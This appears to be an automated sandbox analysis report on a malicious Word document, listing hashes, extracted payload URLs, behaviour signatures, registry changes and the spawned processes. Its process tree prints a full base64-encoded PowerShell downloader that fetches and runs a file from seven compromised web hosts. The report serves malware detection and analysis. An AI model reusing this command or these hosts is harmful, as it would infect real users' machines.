Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06/09/2024, 12:16
Behavioral task
behavioral1
Sample
cf8326ab2b4c8fbb781a95ec3b7a694a_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
cf8326ab2b4c8fbb781a95ec3b7a694a_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
cf8326ab2b4c8fbb781a95ec3b7a694a_JaffaCakes118.doc
-
Size
161KB
-
MD5
cf8326ab2b4c8fbb781a95ec3b7a694a
-
SHA1
4e875e7fd5d5c66630f7adf7b3136d370f30086b
-
SHA256
81ff31f096bddd2ff26d45e40e9ca26907b866d9b1c05c7504027649c31711b9
-
SHA512
0bf4eb8b9d2d3e0a2626b910793f54b291bf9d81097c4168cc1494c4db66aebe76719867955b8583c8dd077a3488590beec7d19a4b3d63fc664540fa47526ba1
-
SSDEEP
1536:8Ij9atFqpRIj9atFqpvrdi1Ir77zOH98Wj2gpngB+a9z7U3N7NSDuy:2rfrzOH98ipgzm7NSDb
Malware Config
Extracted
https://templatejson.com/awrrn/Kw10uo/
https://hosting.mybestheme.com/aikjj0q/8/
https://tastes2plate.com/wp-content/uploads/6/
http://madeirawildlife.com/wp-admin/zuWZW/
http://senyumdesa.org/wp-admin/aC4/
https://ibuyoldwebsites.com/modules/QVtEr7/
http://blog.zunapro.com/wp-admin/js/widgets/EH4agl/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2112 2852 powershell.exe 30 -
Blocklisted process makes network request 8 IoCs
flow pid Process 3 2112 powershell.exe 4 2112 powershell.exe 6 2112 powershell.exe 7 2112 powershell.exe 9 2112 powershell.exe 10 2112 powershell.exe 12 2112 powershell.exe 16 2112 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3D9BA43D-DA45-46DC-AA0D-768ACAE0BE14}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{3D9BA43D-DA45-46DC-AA0D-768ACAE0BE14}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{3D9BA43D-DA45-46DC-AA0D-768ACAE0BE14} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2316 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2316 WINWORD.EXE 2316 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2316 wrote to memory of 1412 2316 WINWORD.EXE 34 PID 2316 wrote to memory of 1412 2316 WINWORD.EXE 34 PID 2316 wrote to memory of 1412 2316 WINWORD.EXE 34 PID 2316 wrote to memory of 1412 2316 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cf8326ab2b4c8fbb781a95ec3b7a694a_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABJAHEAYQBqAG0AcAB5AD0AKAAoACcAVgAnACsAJwBiAHkAdgAnACkAKwAnAHgAJwArACcAagB6ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAZABJAGEAUgA4AGgANwBcAG8AZgBmADEARgBFAFkAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAHUAYABSAGAASQB0AFkAYABwAFIATwBgAFQAbwBjAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAsACAAdABsAHMAMQAnACsAJwAxACcAKwAnACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEsAdwBwAHYANwBhAHoAIAA9ACAAKAAnAEoAJwArACcAXwBlACcAKwAoACcAaQBsACcAKwAnAGIAJwApACkAOwAkAEEAdAB4ADMAcQBlAGYAPQAoACcASAA5ACcAKwAnAGgAagAnACsAKAAnAHEAJwArACcAYQBxACcAKQApADsAJABGAHAAegBtAHYAagA2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHEAJwArACgAJwBJACcAKwAnAEwARABpAGEAJwApACsAJwByADgAJwArACgAJwBoADcAJwArACcAcQAnACkAKwAoACcASQBMAE8AZgAnACsAJwBmACcAKwAnADEAZgBlACcAKwAnAHkAcQBJAEwAJwApACkALgAiAHIAYABFAFAAYABMAEEAYwBFACIAKAAoAFsAQwBoAEEAcgBdADEAMQAzACsAWwBDAGgAQQByAF0ANwAzACsAWwBDAGgAQQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEsAdwBwAHYANwBhAHoAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABTAHUAcAB4ADYAdQBrAD0AKAAoACcASABxACcAKwAnADgAbgBnACcAKwAnAF8AJwApACsAJwBwACcAKQA7ACQATgA1ADgAaQB5AGEAMgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgB3AGUAYgBjAEwASQBFAE4AdAA7ACQAVgB6ADAAYgBnAGMANgA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AdABlACcAKQArACgAJwBtAHAAbABhAHQAJwArACcAZQAnACsAJwBqACcAKwAnAHMAbwBuAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYQB3AHIAcgAnACsAJwBuAC8ASwB3ADEAJwArACcAMAB1ACcAKwAnAG8AJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwAHMAOgAnACsAJwAvAC8AaAAnACkAKwAoACcAbwAnACsAJwBzAHQAaQBuAGcAJwApACsAKAAnAC4AbQB5ACcAKwAnAGIAJwApACsAJwBlACcAKwAnAHMAJwArACcAdAAnACsAKAAnAGgAJwArACcAZQBtACcAKQArACgAJwBlAC4AYwBvAG0AJwArACcALwBhAGkAJwArACcAawBqAGoAJwApACsAKAAnADAAJwArACcAcQAvADgALwAnACkAKwAnACoAJwArACcAaAB0ACcAKwAoACcAdABwAHMAOgAnACsAJwAvACcAKQArACcALwB0ACcAKwAoACcAYQBzAHQAZQAnACsAJwBzACcAKQArACgAJwAyAHAAJwArACcAbABhAHQAZQAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAHcAcAAtAGMAJwApACsAKAAnAG8AJwArACcAbgB0AGUAJwApACsAJwBuAHQAJwArACgAJwAvAHUAJwArACcAcAAnACkAKwAoACcAbABvACcAKwAnAGEAJwApACsAKAAnAGQAJwArACcAcwAvADYAJwArACcALwAqAGgAdAB0ACcAKQArACcAcAA6ACcAKwAnAC8ALwAnACsAJwBtACcAKwAoACcAYQBkACcAKwAnAGUAJwApACsAKAAnAGkAcgAnACsAJwBhACcAKQArACcAdwAnACsAKAAnAGkAJwArACcAbABkAGwAJwApACsAJwBpACcAKwAnAGYAJwArACcAZQAnACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAoACcAZABtAGkAJwArACcAbgAvAHoAdQAnACkAKwAoACcAVwAnACsAJwBaAFcALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AcwAnACsAKAAnAGUAbgAnACsAJwB5ACcAKQArACcAdQAnACsAJwBtACcAKwAoACcAZABlAHMAYQAnACsAJwAuACcAKwAnAG8AJwApACsAJwByACcAKwAoACcAZwAvAHcAcAAnACsAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4ALwAnACkAKwAoACcAYQAnACsAJwBDADQALwAqACcAKQArACgAJwBoACcAKwAnAHQAdABwAHMAJwApACsAJwA6AC8AJwArACgAJwAvAGkAYgB1ACcAKwAnAHkAbwAnACkAKwAoACcAbABkACcAKwAnAHcAZQAnACkAKwAoACcAYgBzAGkAJwArACcAdABlAHMAJwApACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwBtAG8AZAAnACsAJwB1AGwAJwApACsAKAAnAGUAcwAvACcAKwAnAFEAJwApACsAKAAnAFYAJwArACcAdABFACcAKQArACcAcgAnACsAKAAnADcALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8ALwAnACsAJwBiAGwAJwApACsAKAAnAG8AZwAnACsAJwAuAHoAdQAnACsAJwBuAGEAcAByAG8ALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtACcAKwAnAGEAZAAnACsAKAAnAG0AJwArACcAaQBuAC8AJwApACsAJwBqAHMAJwArACgAJwAvACcAKwAnAHcAaQBkACcAKQArACgAJwBnAGUAJwArACcAdABzAC8ARQBIACcAKQArACgAJwA0AGEAJwArACcAZwBsACcAKQArACcALwAnACkALgAiAFMAYABwAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASAA2AF8AMQAxAHgAaAA9ACgAKAAnAFMAagBuAHgAcQAnACsAJwBfACcAKQArACcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABIAGMAZABqAHEAbAB0ACAAaQBuACAAJABWAHoAMABiAGcAYwA2ACkAewB0AHIAeQB7ACQATgA1ADgAaQB5AGEAMgAuACIAZABvAGAAdwBOAEwAYABvAEEARABGAGAASQBMAEUAIgAoACQASABjAGQAagBxAGwAdAAsACAAJABGAHAAegBtAHYAagA2ACkAOwAkAFgAaQBvAHoANwBwADEAPQAoACcARwAnACsAJwBoACcAKwAoACcAcQBhAGgAJwArACcAMwB3ACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEYAcAB6AG0AdgBqADYAKQAuACIAbABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADUANwA0ADcAKQAgAHsAJgAoACcASQBuAHYAbwBrAGUALQBJACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKQAoACQARgBwAHoAbQB2AGoANgApADsAJABIAF8AdgBhADIAYgBjAD0AKAAoACcAWgAnACsAJwA5AHcAJwApACsAKAAnAGcAeQAnACsAJwBfAGwAJwApACkAOwBiAHIAZQBhAGsAOwAkAFIAcgAwAHYAMgBhADYAPQAoACgAJwBOACcAKwAnAHIAcwAnACkAKwAoACcAZwAnACsAJwBoAGoAOQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBlAGUAXwB6AGgAZwA9ACgAJwBJACcAKwAoACcAbQA5ACcAKwAnAHMAJwApACsAKAAnAGUAawAnACsAJwB2ACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5d352a9cf88b39bd85b0f1b90b442db88
SHA149c9f255393c501bf100b0f755ccef3cd2e3d30d
SHA25608d26332540d85c4ff3da72f055541bb8c8e030fe0eb59bb14f5dce614343cb6
SHA51238fa7a0d49f5a5d4a1b8508f2583f37677f2895454ee4659987d69a7424db9637c5b54898f48cb111d98fb5676d4fee3c00d9ef16b075379d050ff478f817e2c